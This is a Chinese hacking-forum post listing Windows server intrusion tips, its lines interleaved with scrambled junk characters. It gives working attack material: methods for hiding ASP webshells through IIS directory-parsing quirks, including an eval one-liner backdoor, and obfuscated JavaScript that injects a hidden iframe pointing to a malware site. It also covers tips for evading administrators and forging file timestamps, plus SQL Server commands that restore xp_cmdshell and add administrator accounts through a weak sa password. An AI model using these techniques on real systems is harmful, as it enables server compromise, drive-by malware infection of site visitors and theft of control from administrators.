用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。4 {* n7 n. T9 O6 W3 }
1 m. q* N0 M, Z' _1 ~8 {" J53、隐藏ASP后门的两种方法1 y2 N( L9 ]" u5 S
1、建立非标准目录:mkdir images..\
1 c' f) Y+ g9 k8 k拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, }8 N5 F8 D: o0 j7 L) g通过web访问ASP木马:http://ip/images../news.asp?action=login
3 n7 B% O+ N* U0 }3 X B) q% o如何删除非标准目录:rmdir images..\ /s8 f, C9 t* {; @7 k
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
' ~. l5 x8 W! E0 cmkdir programme.asp# Q/ g/ ]* V8 t& i4 D: U
新建1.txt文件内容:<!--#include file=”12.jpg”-->
$ r: i! y0 H' G3 ^% W' g4 b新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 Z/ ]7 q8 X. }5 o9 m( |4 Iattrib +H +S programme.asp% H( c3 M8 [/ _; {5 x
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: K/ Z; t: e% X
- a( x. o. H( V; `% Z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
$ Z7 s+ ]% z T! h4 ]然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
/ I; @. U9 `) l5 ~0 k. @* t* f7 k' R1 J: @
55、JS隐蔽挂马0 F+ O/ s. E3 L: p$ l. B( c
1.
6 @+ }- s# K; q2 x) @7 ?1 g. {var tr4c3="<iframe src=ht";
# {$ W# t" i; v$ A2 \tr4c3 = tr4c3+"tp:/";
7 \' N7 h% ?0 X( ptr4c3 = tr4c3+"/ww";
1 j$ x* }2 N% o" Q6 D: Otr4c3 = tr4c3+"w.tr4";
( C0 B+ V! o; O. y: O. `3 o3 otr4c3 = tr4c3+"c3.com/inc/m";! L9 l2 @) O" s. s3 v
tr4c3 = tr4c3+"m.htm style="display:none"></i";- M- s( B o+ G! c6 l
tr4c3 =tr4c3+"frame>'";
# G! ~! G0 @7 a+ r; E% n* s! ~9 ?document.write(tr4c3);
% n: ^1 { T E# x# u5 a& `6 c避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。" k e) j& {* A, c1 ^# x
9 _0 R3 j& \/ w
2.
! a: d. n/ _* H4 G0 u6 m; ]转换进制,然后用EVAL执行。如
: \$ v3 h+ [/ X, c: feval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
2 t% [7 \/ k1 q7 |不过这个有点显眼。! r$ Q; [0 C% k F7 P9 Q0 ~$ A
3." b, @& q8 n+ E& o
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');. v. D( ~: A. Q( U. a, T# _
最后一点,别忘了把文件的时间也修改下。
2 t6 L5 T& ^. `) `" r' t7 ?) f' r0 |5 z8 R" L }- `* k
56.3389终端入侵常用DOS命令0 J$ A9 Z) C S! d: d* l8 a5 ]
taskkill taskkill /PID 1248 /t8 e( F; P# l/ b X9 @ u+ K
: C' c9 x" u6 O. k5 o6 }tasklist 查进程
! Q* R3 {' V0 o4 R; p! v
+ V/ T% I' U$ b* P: X6 ocacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限- G+ b& H/ b5 `4 p6 J& ~6 U
iisreset /reboot# T F9 d$ Q E- W
tsshutdn /reboot /delay:1 重起服务器
! L$ O/ ?1 x9 w6 v' L% S2 c
, ], n: k6 B7 ~2 }& D" K# \logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,6 n) B8 D# R2 @, w: B
) `. Q/ p" Q+ g) ?9 Uquery user 查看当前终端用户在线情况9 c/ d( D8 J3 t# m0 \. ^' t) q. w
0 g4 u Q! K# t0 s( G
要显示有关所有会话使用的进程的信息,请键入:query process *
# I0 [8 x2 P# w; x x9 l' N3 o4 _' M6 i5 B! K2 Q8 X( t9 {! E/ W
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 Q( J0 u. O$ W) S& _8 [! l
7 F1 t; o. j' l8 B2 ]要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER21 B$ s) S9 D0 }0 M
) K+ d; C7 G* x要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02# L* d. Y5 z9 v) h, b3 ` w2 @
5 E: y0 l! l( D# u/ j# b/ v7 G) h命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
0 q6 K2 f v- o' s8 O/ k7 h0 x) @1 [* x1 {9 ]' r/ Y
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
+ x1 i$ q2 J( o' R
0 t7 E! T3 o: \命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) W1 I+ E0 H3 n/ w; T+ D7 o' H0 @$ S/ f% J, u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
4 t/ U; q3 ]8 j$ c4 F" ^5 n7 Q+ ~/ B, m/ K9 J
56、在地址栏或按Ctrl+O,输入:
+ c0 v% R; Z/ U8 g+ Ljavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;# f8 y5 B3 A, F
" e2 b }' v3 t$ s" ]源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% F& d. l2 _3 t; v0 I0 A t3 J; Q0 x5 g U R1 B b' S; w
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ X* v" R' O. Z3 o+ y) \; V
用net localgroup administrators是可以看到管理组下,加了$的用户的。
, {4 K( X' F) C, ^8 L1 R
# f- N0 `7 z5 U/ J58、 sa弱口令相关命令. k. H* N6 N0 @& D& H" w
) s9 V5 o% z# g- {, D$ t一.更改sa口令方法:/ v. ?% t4 m9 L6 @/ s, ^; q4 |
用sql综合利用工具连接后,执行命令:% ^( R: y2 r B
exec sp_password NULL,'20001001','sa': y& }! O: X, H* P) l5 k) O
(提示:慎用!)6 ?0 `! ~( F/ m& V) b+ V. \5 N/ d
9 ]& r' p, L# x; `2 w9 m
二.简单修补sa弱口令." Q+ n' a& e' J5 k! Z& y2 v
6 O" i* C. m7 x5 a3 ~, I方法1:查询分离器连接后执行:
4 M4 `5 u% e4 v! Q/ Y9 O4 kif exists (select * from7 V) M' b$ |- p+ v5 D3 K7 U
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and$ s" Z: \* y' F" G2 B% v9 W
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
. S. V" f7 j6 A7 P- s4 t
# S3 ]/ V v: T( @+ Fexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
: `: H, ^2 G; M+ e0 {9 ?
* A$ S4 g4 K% Y$ _0 L& qGO
u5 h- ^. M( }- y1 t, X/ m1 A* u1 I4 h/ g. }
然后按F5键命令执行完毕$ t. a" M7 w: \' ?1 M. P: u1 b
( o4 o ~1 f7 \方法2:查询分离器连接后0 k$ W; E. c* Y- o P! n1 V, d3 I
第一步执行:use master
/ p, [4 G/ r J8 `: K第二步执行:sp_dropextendedproc 'xp_cmdshell'+ e1 Y/ c8 f$ f
然后按F5键命令执行完毕6 \% H7 ]! p' [7 E5 Q7 g
3 f2 |' v: ^2 ~5 }# E& l% D$ V! F* ?8 R' ?4 _. r
三.常见情况恢复执行xp_cmdshell.+ d4 g8 X( n7 k; i8 K
, @, F! d' k: W6 Z1 F& q4 }; M: G% X
1 未能找到存储过程'master..xpcmdshell'.8 w" s5 E7 B4 _9 y9 [; L
恢复方法:查询分离器连接后,* f7 g: @7 `# _1 @2 w/ ~
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! c* ^% e' w) C- E2 ], E$ i' e! D第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 k3 g: H* [- f4 {& s, W1 u然后按F5键命令执行完毕1 e9 J6 i; [, P% j8 \
2 x* E0 B8 a2 x3 H7 }# M8 \$ s2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)( P4 Z6 A' z3 f/ Y* t
恢复方法:查询分离器连接后,
' f. ?! r/ G3 L$ }第一步执行:sp_dropextendedproc "xp_cmdshell"8 N7 K2 E- ]# }* N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 B! N0 D+ Y+ f# w/ h `( J. b然后按F5键命令执行完毕3 ]+ _& n* Q1 B, T
) |5 v- r5 q, b5 _$ r2 F I
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, y: N% L& [$ R1 z% [% r! {恢复方法:查询分离器连接后,
) G9 @1 I9 H# j9 ~4 b( {$ S第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) L. L( e# j& R& F* C. s第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* l0 M( x3 }' W4 S. U, Y然后按F5键命令执行完毕
( V- \3 u: K! v- e8 f
- Q/ f" u, K. U6 B2 f% n4 a& E9 ], F四.终极方法.
. u! r3 s$ C8 s$ o如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 G( w3 {2 m* M查询分离器连接后,. K7 d0 W/ C% [! ^* z
2000servser系统:7 d( }; O) a$ z& z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
, |0 Y& x" B2 A. t8 U0 c
% t1 i; Y2 L9 ^/ t) c5 O2 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'* I4 k4 H6 r5 o1 n
$ B( c* C+ Y0 k% {8 Mxp或2003server系统:
+ c$ u+ d' s* X* P* O( v* X, |2 v+ d; o. [3 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'9 i( a1 A- W7 n' V0 m$ K
5 K5 N K/ G( p4 U e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 |* q) x# l+ V2 P$ F
|
发表于 2012-9-15 14:13:15
收藏
支持
反对